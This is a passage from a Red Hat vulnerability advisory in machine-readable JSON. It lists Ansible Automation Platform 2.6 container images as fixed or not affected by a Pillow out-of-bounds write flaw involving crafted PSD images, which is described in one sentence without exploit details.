"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2439170"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found the Pillow Python imaging library. Providing a specially crafted PSD image may lead to an out-of-bounds write. This could potentially allow for arbitrary code execution or information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pillow: Pillow: Out-of-bounds Write via Specially Crafted PSD Image",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
